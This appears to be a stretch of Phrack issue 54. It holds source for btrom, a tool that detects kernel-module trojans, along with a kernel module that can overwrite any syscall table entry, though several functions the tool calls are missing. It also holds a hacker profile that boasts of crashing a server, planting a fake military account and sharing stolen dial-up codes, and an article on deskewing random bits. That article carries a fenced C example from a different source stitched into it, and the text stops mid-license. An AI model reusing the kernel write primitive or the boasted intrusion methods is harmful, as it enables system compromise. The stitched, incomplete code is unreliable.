version 0.3 (01/12/98) compatible with kernel 2.0 and 2.2.
works with BIG_KERNEL and with SMALL
english version
version 0.2 (25/11/98) first version
version 0.1 (21/11/98) something really ugly
all this started when I saw the itf (integrated trojan facility) in P52-18
------------------------------------------------------------------------------
f e e d b a c k
------------------------------------------------------------------------------
riq@ciudad.com.ar
<++> linenoise/btrom/Makefile
#
# Makefile for b t r o m
#
## BUG: this must be the same path as the one in config.h
SYSTEM_MAP = "/usr/src/linux/System.map"
AWK = awk
CC = gcc
#CFLAGS = -DSYSTEM_MAP=$(SYSTEM_MAP)
all: parse btrom mbtrom
parse:
	$(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h
btrom: btrom.c sys_null.h
	$(CC) btrom.c -O2 -Wall -o btrom
mbtrom:
	$(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c
clean:
	rm -f mbtrom.o btrom.o btrom sys_null.h
<-->
<++> linenoise/btrom/btrom.c
/*
 * btrom - Borra Trojanos Modulo ("module trojan eraser")
 * by Riq
 * 1/Dec/98: 0.3 - Compatible with kernel 2.2 and supports BIG_KERNEL
 * 25/Nov/98: 0.2 - Initial version. Supports kernel 2.0 i386
 */
#include <stdio.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fnmatch.h>
#include <strings.h>
#include <linux/sys.h>
#include "config.h"
#include "sys_null.h"
FILE *sm;
FILE *au;
int quiet;
int borrar;
int dif_n_s;
unsigned int big_kernel;
/***********************************************************************
 System.map
 ***********************************************************************/
int segunda_recorrida(int j)
{
char nombre[50],dire[50];
int address;
int i,old_clean,clean,retval,key;
char c;
unsigned int k;
old_clean=clean=0;
printf( "\n2nd part: Clean Trojans\n"
" s = System.map address\n"
" c = clean address\n"
" m = manual address\n"
" i = ignore\n"
" now System.map Num [ ] Syscall Name\n"
"---------------------------------------\n");
for( i=0; i< NR_syscalls ; i++ ){
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (0)),
"d"((long) (0)));
clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
if( clean > old_clean ) {
if( nombre[0]!=0 ) {
if( sm && sm_busca_x_nombre(&address,nombre)) {
if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
dif_n_s++;
printf("%8x!%8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %3i [%c] %s <c/m/I> ?",retval,i,c,nombre);
} else printf("%8x %3i [%c] <c/m/I> ?",retval,i,c);
old_clean = clean;
fseek(stdin,0L,SEEK_END);
key=fgetc(stdin);
switch(key) {
case 's':
k = address;
break;
case 'c':
k = SYS_NULL;
break;
case 'm':
printf("Enter an hexa address (ex: 001a1b):");
fseek(stdin,0L,SEEK_END);
fgets( dire,50,stdin );
k = strtoul(dire,(char **)NULL,16);
break;
default:
k=1;
break;
}
/* FIXME: 1 cannot be used as an address, it is the `ignore' sentinel */
if(k!=1)
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (1)),
"d"((long) (k)));
}
}
return clean;
}
void help()
{
printf( "\nUsage: btrom nr_of_mbtrom [-c][-v]\n"
"\t1) Install the module mbtrom with `insmod mbtrom'\n"
"\t2) The module must print a number. If not, see the README -> bugs\n"
"\t btrom value_returned_by_mbtrom [-c][-v]\n"
"\t `v' is verbose. Recommended\n"
"\t `c' is clean. Cleans the trojans\n"
"\t3) Uninstall the module mbtrom with `rmmod mbtrom'\n"
"\n"
"\tExamples:\n"
"\t btrom 215 -cv\n"
"\t btrom 214 -v\n"
"\t btrom 215\n"
"\nWarning: Don't pass random numbers. Be careful with that!"
"\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n"
);
exit(-1);
}
void chequear_argumentos( char *parametros )
{
int i,j;
i=strlen(parametros);
if(parametros[0]!='-') help();
for(j=1;j<i;j++) {
switch(parametros[j]) {
case 'c':
borrar = 1;
break;
case 'v':
quiet = 0;
break;
default:
help();
}
}
}
int main(int argc, char **argv, char **envp )
{
unsigned int retval;
int clean;
int i;
printf( "\n\n"
"b t r o m b y r i q\n"
"v"VERSION"\n");
if(argc <2 || argc >3 ) help();
quiet = 1; borrar = 0 ;
if( argc==3) chequear_argumentos(argv[2]);
au = au_open();
sm = sm_open();
if(!au && !quiet)
printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n");
if(!sm && !quiet)
printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n");
dif_n_s=0;
/* __NR_mbtrom number */
i = atoi( argv[1] );
if(!i)
help();
/* Check whether this is a BIG_KERNEL: mode 2 returns the address of sys_call_table */
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(i),
"b"((long) (0)),
"c"((long) (2)),
"d"((long) (0)));
big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL);
/* First pass: detect */
clean = primer_recorrida( i );
/* Verdict from mister btrom */
printf( "\nb t r o m s a y s:\n");
if(dif_n_s>0) {
printf( "Your System.map seems to have a problem.\n");
if(dif_n_s<SYSMAP_LIMIT)
printf( "Wait. Perhaps this is not a System.map problem,\n"
"but something related with the new functions names.\n"
);
else
printf( "Are you sure that you have a valid System.map ?\n");
if(clean)
printf( "Oh no! The problem is the trojan that you have ;-)\n");
}
if(!clean) {
printf( "Your system call table seems to be clean.\n");
if(quiet)
printf("If you want to be more sure use the `-v' option\n");
} else {
printf( "\nWhat do you want to do with the trojan?\n"
"What about cleaning it with `btrom _number_ -c'?\n" );
}
/* Second pass: clean the trojans */
if(borrar && clean) {
if(au)
fseek(au,0L,SEEK_SET);
if(sm)
fseek(sm,0L,SEEK_SET);
segunda_recorrida( i );
}
if(au)
fclose(au);
if(sm)
fclose(sm);
return 0;
}
<-->
<++> linenoise/btrom/config.h
/*
 config.h
 used by btrom.c and mbtrom.c
*/
/*
 Adjust to taste
*/
/* Syscall number assumed to be free in the sys_call_table */
#define NUMERO_VACIO 215
/* Path to the System.map file */
/* If you never compiled the kernel it may be /boot/System.map */
/* FIXME: use the define from the Makefile so this is not set in two places */
#ifndef SYSTEM_MAP
#define SYSTEM_MAP "/usr/src/linux/System.map"
#endif
/* Mismatches between old and new names; usually not a System.map problem */
#define SYSMAP_LIMIT 8
/* Path to asm/unistd.h */
#define ASM_UNISTD "/usr/include/asm/unistd.h"
/* Prefix to look for in asm/unistd.h */
#define AU_PREFIX "#define*__NR_*"
/* How far kernel space (the kernel image) is assumed to extend from its base */
/* FIXME: I do not know the real limit. It works with this anyway :-) */
#define LIMITE_SYSCALL 0x00300000
/*
 Do not modify
*/
/* btrom version */
#define VERSION "0.3"
/* BIG_KERNEL and SMALL_KERNEL */
#define BIG_KERNEL 0xc0000000
#define SMALL_KERNEL 0x00100000
<-->
<++> linenoise/btrom/mbtrom.c
/*
 * mbtrom - kernel module side of btrom (Borra Trojanos Modulo)
 * 25/11/98 - by Riq
 *
 * compile with:
 * gcc -c -O3 -fomit-frame-pointer mbtrom.c
 *
 */
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif
#include <syscall.h>
#include <linux/string.h>
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/malloc.h>
#include <linux/dirent.h>
#include <linux/sys.h>
#include <linux/linkage.h>
#include <asm/segment.h>
#include "config.h"
#include "sys_null.h"
extern void *sys_call_table[];
int __NR_mbtrom;
/*
 * The syscall that mbtrom installs. btrom calls it through int $0x80 with
 *   ebx = numero  (syscall number to read or write)
 *   ecx = modo    (0 = read the entry, 1 = write it, 2 = address of the table)
 *   edx = address (new value for the entry in mode 1)
 */
int* funcion( int numero, int modo, unsigned int *address )
{
	switch(modo){
	case 0:
		return sys_call_table[numero];
	case 2:
		return (void *)&sys_call_table;
	case 1:
	default:
		sys_call_table[numero]=address;
		break;
	}
	return (void *)0;
}
int init_module(void)
{
__NR_mbtrom = NUMERO_VACIO ;
/* Walk down from NUMERO_VACIO looking for a free slot (0 or sys_ni_syscall) */
while ( __NR_mbtrom!= 0 &&
sys_call_table[__NR_mbtrom] != 0 &&
sys_call_table[__NR_mbtrom] != (void *)SYS_NULL )
__NR_mbtrom--;
if(!__NR_mbtrom ) { /* reached 0: no free slot, give up */
printk("mbtrom: Oh no\n");
return 1;
}
sys_call_table[__NR_mbtrom] = (void *) funcion;
if( __NR_mbtrom != NUMERO_VACIO )
printk("mbtrom: Mmm...\n");
printk("mbtrom: -> %i <-\n",__NR_mbtrom);
return 0;
}
void cleanup_module(void)
{
sys_call_table[__NR_mbtrom] = 0;
printk("mbtrom: Bye.\n");
}
<-->
<++> linenoise/btrom/sys_null.awk
/sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 }
<-->
0x6>-------------------------------------------------------------------------
----[ PDM
Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`.
PDM53 recipients:
None of you suckers. Go rent it. It's well worth your time.
PDM54 Challenge:
"I have John Murdock... In mind..."
0x7>-------------------------------------------------------------------------
----[ Super Elite People That REad Phrack (SEPTREP)
New additions: Ron Rivest, W. Richard Stevens
Why they are SEP: One is the `R` in RSA. The other writes TCP/IP bibles.
----[ Current List
W. Richard Stevens
Ron Rivest
-----------------------------------------------------------------------------
----[ EOF
----[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 04 of 12
-------------------------[ P H R A C K 5 4 P R O P H I L E
-----------------[ Personal
Handle: ParMaster
Call him: Ishmael? SHALL WE PLAY A GAME?
Reach him: Through the grapevine
Past handles: Trouble Verify, Immediate Lee, Bad Karma, Thoth,
Optomystic, (The) Omicron
Handle origin: (Quote from Underground page #104) "Par had got his full
name -The Parmaster- in his earliest hacking days.
Back then, he belonged to a group of teenagers involved
in breaking the copy protections on software programs
for Apple IIe's, particularly games. Par had a
special gift for working out the copy protection
parameters, which was a first step in bypassing the
manufacturers' protection schemes. The ringleader
[sc0tch] of the group [Jedi Hackers] began calling
him 'the master of parameters' -The ParMaster- Par,
for short. As he moved into serious hacking and
developed his expertise in X.25 networks, he kept the
name because it fitted nicely in his new environment.
'Par' was a common command on an X.25 pad, the modem
gateway to an X.25 network."
Date of birth: NOT January 15th!
Age at current date: 27
Height: 5'11"
Weight: 202 lbs
Eye color: Brown
Hair color: Brown (Blonde highlights)
Computers: Dell 320n 386 laptop, Walkabout vt100 terminal with
built-in 2400 baud modem.
Sysop/Co-Sysop of: DarkF0RCE
Admin of: [Withheld]
URLs: http://altavista.digital.com - search - "parmaster" -
- submit - read.
----------------[ Favorite things
Women: Blondes with blue / green eyes. Chicks in skimpy clothes
with accents.
Cars: Ferrari and Porsche clubs :-), anything with a jet
engine on it.
Foods: Chinese, got to have my chinese food. Calamari, Duck,
Quail, most seafood.
Alcohol: Now, we're talkin'. Jim Beam, Jack Daniels, Crown Royal,
Jose Cuervo / Dos Realis, and last but certainly not
least Finlandia!
Music: The The, The Dickies, Underworld, Kraftwerk, Chemical
Brothers, Crystal Method, El Dubarge, CCCP.
Movies: They Live, A fish called wanda, 13 Monkees, Little
Trouble in Big China, 5th Elemental, True Lies,
Killer Klowns from Outer Space, Eraser, Under
Siege, Tetsuo Ironman, WarGames, and Sneakers.
Authors: Immanuel Velikovsky, Piers Anthony, Terry Brooks, James
Gardner, J.R.R. Tolkien and please forgive me for
anyone i'm missing.
Turn Ons: Traveling in my mind with someone i love.
Turn Offs: Pain, agony, hurting and torture.
----------------[ Passions
I enjoy scrying the future and doing the great work. This is a very difficult
thing to describe in itself. Some of you who know me well enough can see it
every once in a while. I'm no artist, but i attempt to do it and sometimes it
expresses itself in artistic ways.
I love hanging out with my friends, sometimes i need to be alone, but time
i spend with my friends is always special.
----------------[ Memorable experiences
When the US Secret Service raided me in 1991 and took all my stuff (the 3rd
time) including the credit reports of the President (iffie) and Vice President
(definitely) of the United States of America. I was in jail in New York
waiting for transport, and was never really threatened or hurt, except once
and it was a major incident for me but i don't think it was influenced by
anyone.
When i did an interview for Coast Weekly Magazine in Monterey County in
1993, after this issue came out things really fell apart for me, people
started being really mean and really dangerous people started doing really
harmful things around me. This article was my one 'play article'. I
mentioned a lot of stuff that was currently going on, including the Clinton
Administration's use and promotion of the new Clipper Chip device. I wonder
why the guys who did a play article for the San Jose Mercury News didn't
receive the same treatment. My relatives always told me life isn't fair,
until this time i had plenty of reasons to believe that but never did.
Incidents following this made me really question how the United States was
changing. It especially made me question who is running the world nowadays
and who they made a decision to hire under them to work in various agencies.
Everything just seemed to have more style before. However, there are also a
lot of cool things with style brought about by this, which may be worth the
hardships in their value.
Using sprite to send an out of bounds packet to port 139 of trv-psitech.com,
the server was down for a little bit, a day or two. The error it responded
with, "Parameter not found".
Creating IRAQ-DEFENSE password PARMASTERG0TTHEM! on tymnet while i was "in".
I'm not sure what effect this had during the time i had set it up during
Operation Desert Shield. I put it out into the computer underground globally
promoting it as an iraqi system i had found. What effect this may have had
during that time i still do not know. Logically all i can assume is that it
managed to put a lot of hackers who tried it, in one place at the time when
they connected to it. As well as promote and possibly move them toward being
aware of any enemy computers they may have hacked. Indeed, on the boards
i was confronted about it... Specifically by Crimson Death who stated in the
posts that it was, in fact, not an iraqi system at all. Interestingly enough
in following posts people responded *WITH* actual network addresses and
hosts of iraqi systems. Too bad at the time all communications were cut.
Most certainly, their access to the outside worlds computers was at least
partially if not totally through Bahrain. Every once in a while i would
periodically check on tymnet's bahrain gateway and monitor traffic there.
For those of you who wonder why i did this, i don't know... I can honestly say
I wasn't in conscious control of what i was doing. I have some theories about
why, some include a higher power others include some pretty crazy stuff like
mind control. I'm leaning somewhat towards the latter because i had some
severe memory problems. I could not remember anything about this until I
was on a phone interview with Joshua Quittner for the Masters of Deception
book, why at that time I recalled it i do not know. I do know that prior
to this time in searching through my memory fervently that I had not
previously at any other time after 1990 thought about or recollected my
actions then. The only thing i remembered was creating ParMasterX75 nui
Password par=tymnet gawd! and that was because the account I had used to
make IRAQ-DEFENSE had mysteriously changed its properties and now was
connected to place calls on the global data network. Prior to that it had
only been able to connect to the select hosts of the WEFA group, its rightful
owner. I only became aware of this because of Corrupt [MOD] pointing out that
I should list out what accounts were active. I then saw that he had created
an account which could be used to place data calls. John apparently did
not know that the properties of the account's access had changed and that
it did not have access to do things like that before, if he did he was not
offering that knowledge, or even better he may have changed it :-).
Disneyland.
----------------[ Boards to mention
The board that Mr. Zod set up on the 202 sprintnet system owned by AFOSI and
used to train them on how to catch computer hackers *GUFFAW*, my I wonder
if they ever found out? Weren't we why they called it that? ROFLMFAO
DarkF0RCE, I wonder whatever happened to Derek.. One Man Army.. Hmm, like
people are posting these PC Pursuit codes on our board, i wonder where
they came from? Phear P0STMASTER's ACOS skills. ROFLMFAO
Pegasus, this BBS run on a VAX in switzerland ended up turning out to be part
of a sting operation involving law enforcement in europe.... Why do all these
k-k00l codes still work tho?
Unphamiliar Territories, invalid media's board. Managed to collect together
quite a few people with talent as well as some really stupid asshole narks.
Can anyone say PMF?
Bullet, wherever it is... There you are.
BlackNET, so much has been said about this one in circles it's not funny. No
one knows where it is or how to connect to it? I wonder why... I'm confused.
Fuck QSD Channel.
Sectec, this board was always an old stand-by for me when the internet was
taking off.. Now boards with discussions on packet switched nets like it
aren't around. Or, if they are they are hidden and not openly promoting
themselves. Most likely, they are somewhere on the internet...It's probably
just me... but i don't trust the internet... at all.
ALTGER, altos computer systems munich.... i know far too many people from this
board in real life now. 12 years ago I never would have thought that this
would occur or feasibly see how this would happen. It's still mind-boggling
to me. Old skool Apple warez crew: Blue Adept [213], Ubiquitous Hacker,
Hollywood, Vampire, Pirette. Others: Piper, Dr. Who, Shatter, Theorem, Nora,
and Nasa Pilot.
ALTHH, altos computer systems hamburg (later Markt and Technic... tchh), same
as altger but I spent MUCH MUCH more time here. I think this is where I got
the magic. THE crew: Floyd, TTM, Necrovore-Skyhook-backlash-LineShadow-
TouchTone [Xtension], jumpingjackflash, Lutz Pelikan, camelot, pad-gandalf-
fusion-power-etc [8LGM], Force-Phoenix-Nom-etc [The Realm], anthrax, there
are too many people to list here forgive me if I left you out. You know
who you are.
The Phoenix Project, what a cool place, where else could I tease Sandy
Sandquist about FTS.
Illuminati BBS, my account was short lived and i logged in maybe twice. But
where else could i see the latest on AD&D games with, The Mentor, Erik
Bloodaxe, etc.
The initial r00t homepage, boy was this a funny joke. Wait, i'm at a con
and now its all real and there's like 40 people here. These people are
smart and make lots of money. Hosaka and T3... You could not have known it
would turn into this. r00t people who kick ass: Number one for all time -
glyph a.k.a necrovore, alhambra, oghost, redragon [tacobell.com], and daemon9.
Ripco, well I wasn't on here a lot but it played such an important part in the
computer underground over the years i have to at least mention it. It must
have also been my first exposure to l0ck. Tons of other people here, this
place kept lots of Text files circulating in the underground that might
have otherwise been lost.
----------------[ Quotes
"I didn't mean for your daddy to spooge all over the minnie mouse pillow on
your bed, it wasn't my fault, i told him he could cum in my ass" -- Vamprella
"No." -- Agent Steal
"Remember when i did that class change for you?" -- U4EA
"How did you know i was gonna say that about butter?" -- Nirva
"I got approval from Uli to start Chaos Computer Club West, want to be in
it?" -- Doc Holiday
"Bilbo Baggins, how are youuuuuu" -- Torquemada
----------------[ The future of the computer underground
The future? Hmm. Am I the guy to ask? Maybe. Things have changed a lot,
the only thing constant is change. It seems there is less chivalry nowadays.
The government and corporations painted a picture of us. That picture is
not a pretty one. They even have a general psychiatric profile we are all
supposed to fall into. Movies, like "Hackers" portray us a certain way
also. Kids just starting out, see this and immediately it becomes the way
the underground is. The Masters of Deception also promoted this image of
the Computer Underground. We end up fighting ourselves more than working
together to accomplish goals. I remember a time when things weren't like
that. There was very little confrontation between hackers, and information
flowed freely. If you ask me, it's all a big conspiracy :-). A big conspiracy
to keep hackers separated and fighting among themselves. People like to talk
to me about the good old days. That's all well and good, but those days are
over. There can still be another golden age in the Computer Underground.
The only thing stopping it, is you.
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 05 of 12
-------------------------[ Linux and Random Source Bleaching
--------[ Phunda Menta <phundie@usa.net>
----[ Introduction
Random numbers are often used in cryptography, but good random bits can be
hard to come by. Linux has two useful pseudo-devices called /dev/random and
/dev/urandom. Catting /dev/random yields a small pool of random bits obtained
from internal system state. If you cat this output to your terminal and bang
on some keys, you'll notice that you get more random bits. Disk drive
accesses, IRQ timings, and key presses; all of this stuff gets hashed into
a small pool of entropy that can be accessed directly from /dev/random.
/dev/urandom is a stream that hashes /dev/random, and gives you that hash
value; then it hashes the last hash and the pool forever. Both give a
decent source of random bits. By default, /dev/urandom uses SHA (I know
the source comments claim MD5, but if you look at the code, it is SHA).
So /dev/urandom is a decent source of pseudo-random bits. /dev/random
is better, but it is of limited size.
These are very useful, but what we really want is a hardware source of random
bits.
----[ The Hardware Solution
Most computers have sound cards these days, and a sound card is a
great source of potential entropy.
Unplug the microphone from your sound card and cat /dev/audio to a file.
Sample maybe 200 or 300 KB of data. Now play it back; if it sounds like static
you can skip ahead to cleaning up the source. You can also try plugging a
1/8-inch jack (or whatever your input takes) with dead-end leads into the mic
port. Try both of these methods and use whichever gives a clean static hiss.
Chances are that on playback all you have is silence, but we want static.
Static is random, and randomness is our goal here, so grab an FM radio and
tune it to the high end, around 106 or 107 MHz. Find a frequency that gives a
good clean hiss, an analog tuner is best for this. If you have a digital
tuner and can't get the precision needed to tune-in a good static source then
get the best static you can, but you might have a harder time cleaning up this
source. If your signal has a high-pitched tone present you can clean this out
in a few different ways. The easiest is to use software to strip out that
frequency. There is a family of programs for Linux that can help with this
(Bio, Mammut, and Ceres). These programs allow very good visualization of the
signal and they also allow you to pull the signal apart and isolate different
frequencies. Chances are you will have a bunch of junk in the 60 Hz region,
probably due to EMI (electro-magnetic interference) from power supplies, along
with whatever is giving you that tone.
In either case you should shield your FM receiver and the audio cable to avoid
EMI. You may be able to shield your sound card too, but I am skeptical of the
worth of this. A lot of electronics supply houses sell shielding wrap and
preshielded cables. You can also try aluminum foil. I haven't had much luck
with aluminum foil, but some people swear by it.
Once you have your source set up, jack it into your sound card and sample it
at 44.1 kHz. Run the results through the Diehard testing package (a battery of
tests to evaluate the strength of random number generators). Your raw source
won't pass the tests.
Clean up your source bytes however you need to. Strip out any 60 Hz junk with
Mammut by using the Transform|Filter options, you can then use the
Transform|Phase Shift option to slide the wave form back into place so that
there is no gap at 60 Hz. If your static source has a small amplitude, crank
it up by increasing the hardware gain, or use Mammut to change the derivative
or the effective gain, whichever you like. I have found no empirical evidence
to suggest that one way works better than the others, but, theoretically,
changing the slope may be a Bad Thing (tm). You may also want to use the
Phase Shift and Threshold options to chop up your signal. You can
resynthesize the parts and save them back out. Listening to these parts, and
graphing them can help give you an idea of what other things your source
signal is doing.
If push comes to shove, and you can't weed out all of the bias, or if you need
a more hands-free way to clean up the source (and don't have the time or skill
to write custom filters) you can just use a cryptographic hash.
After you clean up your source, take a look at it with ceres or bio, if the
output looks like video static with no noticeable patterns or hot/cold areas
then you have sufficiently cleaned up the signal, now you can move on to
bleaching the static for use as a random number stream.
As a side note, if you ever want to see what a good random distribution is
supposed to look like, you can also use output from /dev/urandom. Use sox
(stock with Redhat distros) to convert the output stream of /dev/urandom
(use a type of 'ul') to AIFF for mammut, or ceres or whatever. The
distribution given by /dev/urandom is statistically random so it will tell us
what to look for, but /dev/urandom (SHA, basically) is still pseudo-random
since complete knowledge of the previous inputs allows us to calculate all
future outputs. This is not so with static.
----[ Bleaching the data stream
The static coming out of your FM source is skewed white noise. We need to
clean it up, so we bleach it.
RFC 1750 gives a slew of methods to clean up your source. One of the simplest
effective methods of whitening a source is to XOR all the bits in a byte
together, yielding one output bit; eight such bits are then reassembled into
an output byte. This method has a few advantages. The first big advantage is
that you know precisely how many bytes you need to sample in order to obtain a
given number of output bytes: eight input bytes per output byte. XORing is
also fast and easy to implement.
Another method of deskewing data, attributed to John von Neumann in RFC 1750,
is called transition mapping. Transition mapping is a relatively simple
process: take two bits from the input; if the pair is 01 or 10, output a 0 or
a 1 respectively; the pairs 00 and 11 are discarded. Provided the input bits
are independent, this removes the bias completely, at the expense of needing
an unknown number of input bits (a biased source yields on average fewer than
one output bit per four input bits). Transition mapping is also a very fast
process, and on a lightly skewed input it can yield more output bits than XOR.
Both XOR and transition mapping are fast processes that are good enough to
deskew a set of bits such that they will pass the Diehard suite of tests,
if the input is suitably clean and random. If the input is somehow correlated,
you will have a harder time getting it to pass Diehard. I have found that
correlated sources can be cleaned up by XORing the output of an XOR
distillation with the output of a transition mapped distillation.
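As an added example that is not the article's own code (the page ships
xor_distill.c and transmap.c as separate files), the C below implements the
two RFC 1750 deskewers described above and runs them over a constructed,
deliberately biased bit stream so the change in the 0/1 balance can be
measured. The biased source is an integer hash of a counter thresholded to
emit 1 bits about 70% of the time; it is a stand-in for sampled FM static and
is labelled as constructed in the code. Two known-answer helpers on tiny
inputs are included so the bit packing can be checked by hand.

```c
/*
 * Added example, not the article's own code: RFC 1750 XOR distillation and
 * von Neumann transition mapping on a constructed biased bit stream.
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* XOR of the 8 bits of one byte (its parity). */
int parity8(uint8_t b)
{
    b ^= b >> 4; b ^= b >> 2; b ^= b >> 1;
    return b & 1;
}

/* XOR distillation: every 8 input bytes yield exactly 1 output byte, so the
 * output size is known in advance. Returns the number of bytes written. */
size_t xor_distill(const uint8_t *in, size_t n, uint8_t *out, size_t outcap)
{
    size_t o = 0;
    for (size_t i = 0; i + 8 <= n && o < outcap; i += 8) {
        uint8_t byte = 0;
        for (int k = 0; k < 8; k++)
            byte = (uint8_t)((byte << 1) | parity8(in[i + k]));
        out[o++] = byte;
    }
    return o;
}

static int get_bit(const uint8_t *buf, size_t i)
{
    return (buf[i / 8] >> (7 - (i % 8))) & 1;
}

/* Von Neumann transition mapping: read the input in bit pairs, emit 0 for 01
 * and 1 for 10, drop 00 and 11. Output length depends on the data. Returns
 * the number of output bits; unused bits of 'out' are left zero. */
size_t transmap(const uint8_t *in, size_t n, uint8_t *out, size_t outcap)
{
    size_t nbits = n * 8, obits = 0;
    memset(out, 0, outcap);
    for (size_t i = 0; i + 1 < nbits && obits < outcap * 8; i += 2) {
        int a = get_bit(in, i), b = get_bit(in, i + 1);
        if (a == b)
            continue;                               /* 00 or 11: discard */
        if (a)                                      /* 10 -> 1, 01 -> 0 */
            out[obits / 8] |= (uint8_t)(0x80 >> (obits % 8));
        obits++;
    }
    return obits;
}

/* Fraction of 1 bits among the first nbits of buf; 0.5 is the goal. */
double ones_fraction(const uint8_t *buf, size_t nbits)
{
    size_t ones = 0;
    for (size_t i = 0; i < nbits; i++)
        ones += (size_t)get_bit(buf, i);
    return nbits ? (double)ones / (double)nbits : 0.0;
}

/* Constructed biased source (stand-in for the sound card): each bit is 1 with
 * probability pct_ones/100, driven by a 32-bit hash of a counter (lowbias32)
 * so that successive bits are independent. */
void make_biased(uint8_t *buf, size_t n, uint32_t seed, int pct_ones)
{
    uint32_t thresh = 65536u * (uint32_t)pct_ones / 100u, ctr = seed;
    for (size_t i = 0; i < n; i++) {
        uint8_t byte = 0;
        for (int k = 0; k < 8; k++) {
            uint32_t x = ctr++;
            x ^= x >> 16; x *= 0x7feb352du;
            x ^= x >> 15; x *= 0x846ca68bu;
            x ^= x >> 16;
            byte = (uint8_t)((byte << 1) | ((x & 0xffffu) < thresh));
        }
        buf[i] = byte;
    }
}

/* Run 4096 biased bytes through each stage and return its 1-bit fraction:
 * which = 0 raw input, 1 XOR distilled, 2 transition mapped. */
double demo_fraction(int which)
{
    enum { N = 4096 };
    static uint8_t raw[N], xo[N / 8], tm[N];
    make_biased(raw, N, 0x1234u, 70);
    if (which == 0) return ones_fraction(raw, N * 8);
    if (which == 1) return ones_fraction(xo, xor_distill(raw, N, xo, sizeof xo) * 8);
    return ones_fraction(tm, transmap(raw, N, tm, sizeof tm));
}

/* Known-answer checks on tiny inputs. */
unsigned xor_kat(void)       /* parities 1,0,1,0,0,1,0,1 -> 0xa5 */
{
    static const uint8_t in[8] = {0x01, 0x00, 0x01, 0x00, 0x03, 0x07, 0x0f, 0x1f};
    uint8_t out[1];
    return xor_distill(in, 8, out, 1) == 1 ? out[0] : 0x100u;
}
unsigned transmap_kat(void)  /* 0x66 = 01 10 01 10 -> bits 0101: 4 bits, 0x50 */
{
    static const uint8_t in[1] = {0x66};
    uint8_t out[1];
    size_t nb = transmap(in, 1, out, 1);
    return (unsigned)((nb << 8) | out[0]);
}

int main(void)
{
    printf("raw %.4f  xor %.4f  transmap %.4f\n",
           demo_fraction(0), demo_fraction(1), demo_fraction(2));
    return 0;
}
```

With independent bits of bias e = Pr[1] - 1/2, the XOR of eight of them has
bias 2^7 e^8 (the piling-up lemma), so a 70/30 source comes out at about
0.5003; transition mapping lands on 0.5 exactly in expectation but returns
only 2p(1-p) output bits per input pair, about 0.42 here. Neither removes
correlation between neighbouring samples, which is why the article pairs them
on a correlated source.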
Slower constructions can be created out of cryptographic hash functions,
but may be trusted more by the paranoid. Hash functions are also recommended
if an attacker has the means to somehow affect your random source. If you
are worried about this attack, a good way to solve it is with appeal to
/dev/random. Use a block cipher such as 3DES to encrypt your random
source with a key and initialization vector obtained from /dev/random. If an
attacker can bias your source in a predictable way, he still has no idea
what bytes you may be using for your actual random numbers. Skew that the
attack may introduce into your hardware can first be cleaned with a process
like transition mapping and then pumped through a looped hash function or a
block cipher.
The output of a (decent) hash function or block cipher will pass the
Diehard tests. Keep in mind what that does and does not prove: Diehard
measures statistical distribution only, and the hash of a predictable input
passes just as well, so passing says nothing about how much entropy went in.
In a heavily used machine, where the entropy pool used by /dev/random will be
updated frequently, the output from the above processes can be XORed byte
for byte with the stream from /dev/urandom. This is a simple method to mix
the streams together for added security. Another method would be to hash
N/2 bytes from /dev/urandom and N/2 bytes from your source together, where
N is the number of bytes that your hash function will yield.
All of these methods are suitable to deskew a data set, but they should not be
used blindly. Before putting the resulting bits to use, examine several
samples with Diehard and graphic or spectral tests.
I have included code to do XOR and transition mapping, along with hashing
mechanisms. I have plenty of code for other hash and block cipher based
constructions too, but I did not include it here because that code is not
self-contained (it needs some crypto libs).
If you want to contact me about the code or if you have some comments or
suggestions, I can be reached at phundie@usa.net.
----[ References and Related stuff:
RFC1750 Randomness Recommendations for Security
http://www.kobira.co.jp/document/rfc/RFC1750.txt
Diehard Test Suite
http://stat.fsu.edu/~geo/diehard.html
Pseudo-Random Number Conditioning
http://www.clark.net/pub/cme/html/ranno.html
Linux MIDI & Sound Applications (has links to Mammut, Bio and Ceres)
http://www.bright.net/~dlphilp/linux_soundapps.html
----[ The code
<++> bleach/Makefile
all:
	gcc -w -c md5/md5.c
	gcc -c sha/shs.c
	gcc -o sha_distill sha_distill.c shs.o
	gcc -o md5_distill md5_distill.c md5.o
	gcc -o xor_distill xor_distill.c
	gcc -o transmap transmap.c
<-->
<++> bleach/md5/md5.c
/*
***********************************************************************
** md5.c -- the source code for MD5 routines **
** RSA Data Security, Inc. MD5 Message-Digest Algorithm **
** Created: 2/17/90 RLR **
** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. **
***********************************************************************
*/
/*
***********************************************************************
** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. **
** **
** License to copy and use this software is granted provided that **
** it is identified as the "RSA Data Security, Inc. MD5 Message- **
** Digest Algorithm" in all material mentioning or referencing this **
** software or this function. **
** **
** License is also granted to make and use derivative works **
** provided that such works are identified as "derived from the RSA **
** Data Security, Inc. MD5 Message-Digest Algorithm" in all **
** material mentioning or referencing the derived work. **
** **
